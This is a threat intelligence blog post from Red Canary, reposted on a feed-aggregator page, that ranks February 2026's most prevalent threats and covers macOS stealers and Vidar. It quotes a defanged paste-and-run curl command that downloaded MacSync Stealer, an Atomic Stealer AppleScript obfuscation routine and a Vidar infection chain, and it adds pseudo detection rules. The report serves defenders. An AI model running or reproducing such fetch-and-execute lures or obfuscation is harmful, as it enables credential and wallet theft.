惯性聚合 高效追踪和阅读你感兴趣的博客、新闻、科技资讯
阅读原文 在惯性聚合中打开

推荐订阅源

Threat Intelligence Blog | Flashpoint
Threat Intelligence Blog | Flashpoint
T
Troy Hunt's Blog
Scott Helme
Scott Helme
T
Threat Research - Cisco Blogs
T
Tenable Blog
L
LINUX DO - 热门话题
V
Visual Studio Blog
I
Intezer
Blog — PlanetScale
Blog — PlanetScale
Cisco Talos Blog
Cisco Talos Blog
A
Arctic Wolf
C
Cyber Attacks, Cyber Crime and Cyber Security
F
Fortinet All Blogs
aimingoo的专栏
aimingoo的专栏
Know Your Adversary
Know Your Adversary
CTFtime.org: upcoming CTF events
CTFtime.org: upcoming CTF events
N
Netflix TechBlog - Medium
SecWiki News
SecWiki News
I
InfoQ
Microsoft Security Blog
Microsoft Security Blog
Project Zero
Project Zero
W
WeLiveSecurity
Microsoft Azure Blog
Microsoft Azure Blog
A
About on SuperTechFans
Recorded Future
Recorded Future
Cyber Security Advisories - MS-ISAC
Cyber Security Advisories - MS-ISAC
Vercel News
Vercel News
S
Securelist
Spread Privacy
Spread Privacy
L
LangChain Blog
云风的 BLOG
云风的 BLOG
G
Google Developers Blog
MongoDB | Blog
MongoDB | Blog
Google DeepMind News
Google DeepMind News
Recent Commits to openclaw:main
Recent Commits to openclaw:main
D
Darknet – Hacking Tools, Hacker News & Cyber Security
C
CERT Recently Published Vulnerability Notes
罗磊的独立博客
K
KPMG report finds enterprise disconnect between AI and its ROI | CIO
The Last Watchdog
The Last Watchdog
Attack and Defense Labs
Attack and Defense Labs
博客园 - 司徒正美
Help Net Security
Help Net Security
L
Lohrmann on Cybersecurity
人人都是产品经理
人人都是产品经理
Forbes - Security
Forbes - Security
Hacker News - Newest:
Hacker News - Newest: "LLM"
PCI Perspectives
PCI Perspectives
博客园 - 【当耐特】
T
Tor Project blog

Red Canary

Train, triage, repeat: The AI agent changing how we fight phishing | Red Canary Intelligence Insights: June 2026 | Red Canary The dual-use dilemma: Rethinking detection for remote access tool abuse | Red Canary How threat hunting evolves at scale Investigating suspicious AI workflows in Microsoft Entra Agent ID: Assistive agents Red Canary CFP tracker: May 2026 Investigating suspicious AI workflows in Microsoft Entra Agent ID: Agent’s user account Grading on a curve: How to assess a pentest Investigating suspicious AI workflows in Microsoft Entra Agent ID: Autonomous agents Intelligence Insights: May 2026 Investigating server compromises with cgroups: A Linux DFIR primer Spring cleaning your browser Red Canary CFP tracker: May 2026 How AI can streamline your security testing Intelligence Insights: April 2026 Identity, browsers, and node.js: Everything you missed in the Threat Detection Report miniseries New: Use response actions to update Zscaler policies and block threats AI in cybersecurity: The good, the bad, and the FUD Red Canary CFP tracker: April 2026 Scarlet Goldfinch’s year in ClickFix AI and browser threats stand out in the 2026 Threat Detection Report Moving up the Assemblyline: Exposing malicious code in browser extensions The RSAC 2026 Conference talks worth catching Hunting for malicious OpenClaw AI in the modern enterprise Breaking down a supply chain attack leveraging a malicious Google Workspace OAuth app Red Canary CFP tracker: March 2026
Intelligence Insights: March 2026
Chris Brook · 2026-03-20 · via Red Canary

Intelligence Insights: March 2026

ScreenConnect stays the course, Mac infostealers surge, and Vidar resurfaces in this month’s edition of Intelligence Insights

Highlights from February

ScreenConnect remained at number 1 on this month’s top 10 most prevalent threat list. ScreenConnect is a ConnectWise product that administrators and adversaries alike use to remotely access and manage devices. Similar to prior months, the malicious ScreenConnect we saw was delivered via phishing with a variety of lure styles, including party invitations and social security documents. In a few instances, successful phishing lure execution initially delivered a different remote monitoring and management (RMM) tool—we observed Datto, CentraStage, and Syncro—which then went on to install ScreenConnect.

We have a four-way tie for 2nd this month that includes one of last month’s newcomers, ClearFake, and top 10 frequent flier Scarlet Goldfinch. ClearFake is an activity cluster that uses JavaScript injected into compromised websites to deliver malware via drive-by download techniques, often using fake CAPTCHA lures to trick users into executing code via paste and run. Scarlet Goldfinch is Red Canary’s name for an activity cluster that uses compromised web sites to trick users into executing malicious code. Scarlet Goldfinch has also used paste and run since 2025.

All four of this month’s 2nd place threats currently leverage paste and run for delivery and initial execution.

Sharing in the tie for 2nd are Atomic Stealer and MacSync Stealer. Atomic Stealer (aka AMOS) is designed to target data within web browsers and locally stored files on macOS systems, with the goal of accessing sensitive information including credentials, payment card data, keychain details, and cryptocurrency wallets. MacSync Stealer is also a macOS threat designed to access similarly sensitive information. This is the highest rank that both Atomic Stealer and MacSync Stealer have reached on our top 10 list, and this also marks MacSync’s first appearance on the list since its top 10 debut in December 2025. You can read more about our recent Atomic Stealer and MacSync observations below.

Vidar made the list in 6th. An infostealer used to steal credentials and other data, it was last seen in our top 10 in September 2022. You can read more about Vidar below.

This month’s top 10 threats

To track pervasiveness over time, we identify the number of unique customer environments in which we observed a given threat and compare it to what we’ve seen in previous months.

Here’s how the numbers shook out for February 2026:

Month's rankThreat nameThreat description
Month's rank:

1

Threat name:Threat description :

ConnectWise product that administrators and adversaries alike use to remotely access and manage devices

Month's rank:

2*

Threat name:Threat description :

Information stealer designed to target data within web browsers and locally stored files on macOS systems, with the goal of accessing sensitive information including credentials, payment card data, keychain details, and cryptocurrency wallets

Month's rank:

2*

Threat name:Threat description :

Activity cluster that uses JavaScript injected into compromised websites to deliver malware via drive-by download techniques, often using fake CAPTCHA lures to trick users into executing code via malicious copy and paste

Month's rank:

2*

Threat name:Threat description :

macOS threat designed with the goal of accessing sensitive information including credentials, payment card data, keychain details, and cryptocurrency wallets

Month's rank:

2*

Threat name:Threat description :

Red Canary's name for an activity cluster that uses compromised web sites to trick users into executing malicious code

Month's rank:

6

Threat name:Threat description :

Malware used to steal credentials and other data

Month's rank:

7

Threat name:Threat description :

Red Canary's name for a cluster of activity, delivered via installers masquerading as legitimate free software, that progresses through several stages to a PyInstaller EXE with stealer capabilities

Month's rank:

8

Threat name:Threat description :

Legitimate remote access tool (RAT) that can be used as a trojan by adversaries to remotely control victim endpoints for unauthorized access

Month's rank:

9*

Threat name:Threat description :

Dropper/downloader that uses compromised websites to redirect users to adversary infrastructure posing as necessary browser updates to trick users into running malicious code

Month's rank:

9*

Threat name:Threat description :

Family of malicious NodeJS applications that masquerade as a helpful AI or utility tool while conducting reconnaissance and executing arbitrary commands in memory in the background

= trending up from previous month
= trending down from previous month
➡ = no change in rank from previous month

*Denotes a tie

Studying stealers: Atomic and MacSync observations

Atomic Stealer continues to evolve and change. In February 2026 we observed it using a numeric obfuscation scheme, specifically character subtraction, likely in response to new XProtect rules for AppleScript stealers that Apple published last month. Here’s an example of what the obfuscation scheme looks like in Atomic Stealer’s code:

on kzxrlybpxq(nums, o) set zuzapk to "" repeat with esrmnlwrwm in nums set zuzapk to zuzapk & (character id (esrmnlwrwm - o)) end repeat return zuzapk end kzxrlybpxq

Red Canary and other researchers continue to see both Atomic Stealer and MacSync delivered via paste and run. In February 2026, we saw overlaps with a campaign using a Homebrew-style pop-up lure to trick users into copying, pasting, and executing a command like curl -kfsSL hxxp://pressureulcerlawyer[.]com/curl/a66e5b9fda4fe269b1c75a5a07d57824099e940a1e59a6964abddae17e444ee3 that then pulled down MacSync Stealer.

malicious paste and run lure

Malicious paste-and-run pop-up lure, image from https://www.iru.com/blog/macos-malware-loader-music-plugin-dmg

Other researchers reported paste-and-run campaigns in February 2026 delivering a new MacSync variant some vendors are tracking separately as SHub; at this time, Red Canary is tracking the new variant as an updated version of MacSync.

After MacSync has collected data, it will package everything up and compress it for efficient theft, often using the macOS utility ditto. This gives us a detection opportunity.

Example of MacSync staging data

Example of MacSync staging data for attempted theft using ditto

Detection opportunity: A process spawning  ditto to compress data and write to the /tmp/ folder

This pseudo detection analytic identifies a process spawning ditto to compress data and write to the /tmp/ folder. ditto is a macOS command-line utility that is commonly used to copy files and directories while preserving file attributes and permissions. Stealers like MacSync can use the tool to collect and exfiltrate sensitive data, move laterally, and/or perform dynamic library hijacking or binary replacement attacks. There may be some backup utilities that legitimately use ditto, so additional investigation into context and exclusions for your environment may be needed.

process == ('sh', 'zsh', 'bash', #)  
&&
process_is_not (*)
&&
command_line_includes ('ditto', '-c', '-k', '--sequesterRsrc', '/tmp/')
&&
command_line_excludes (*) 

Note: # is a placeholder for any other shells of interest to your org * is a placeholder for any additional exclusions your environment may need to reduce noise and increase fidelity, including legitimate ditto use in your environment

Back in vogue: Vidar returns

As LummaC2 and Rhadamanthys use waned after their takedowns in 2025, it was inevitable that adversaries would adopt a new stealer to replace them. Vidar is one of the stealers seeing increased use, and it’s not new to defenders. Vidar has been around since 2018, originally as a fork of Arkei malware. In October 2025, researchers reported an updated version of Vidar that has more advanced anti-analysis, data theft, and browser credential extraction capabilities. Like several other threats in our top 10 list, the recent increase in Vidar activity is due to very successful use of paste and run as an initial execution technique.

Here is an example of what we saw in a Vidar execution chain in February 2026:

  • A user’s Google search led to a site with a fake CAPTCHA paste-and-run lure.
  • After successful lure execution, mshta.exe and curl.exe retrieved and executed the Vidar binary challengecf.exe.
  • challengecf.exe performed several malicious actions, such as spawning and injecting malicious code into chrome.exe and msedge.exe, likely in an attempt to steal sensitive data such as credentials and session tokens.
  • challengecf.exe attempted network connections to telegram[.]me and nwo.re-v.co[.]id.
  • challengecf.exe then spawned cmd.exe to delete itself from disk.

vidar chain

Adversaries continue to use paste-and-run commands that leverage mshta to reach out to remote resources, and that gives us a detection opportunity.

Detection opportunity: mshta utility making external network connections

This pseudo detection analytic identifies when mshta.exe is used to make external network connections. Adversaries—like those leveraging paste and run to deliver Vidar—can use mshta.exe to proxy the download and execution of malicious files. Sometimes mshta.exe is used in this way legitimately, so you may need to research the frequency of the command and the reputation of the domain that’s used.

process == (mshta)
&&
deobfuscated_command_line_includes (http: || https:)
2026 Threat Detection Report

Related Articles

Subscribe to our blog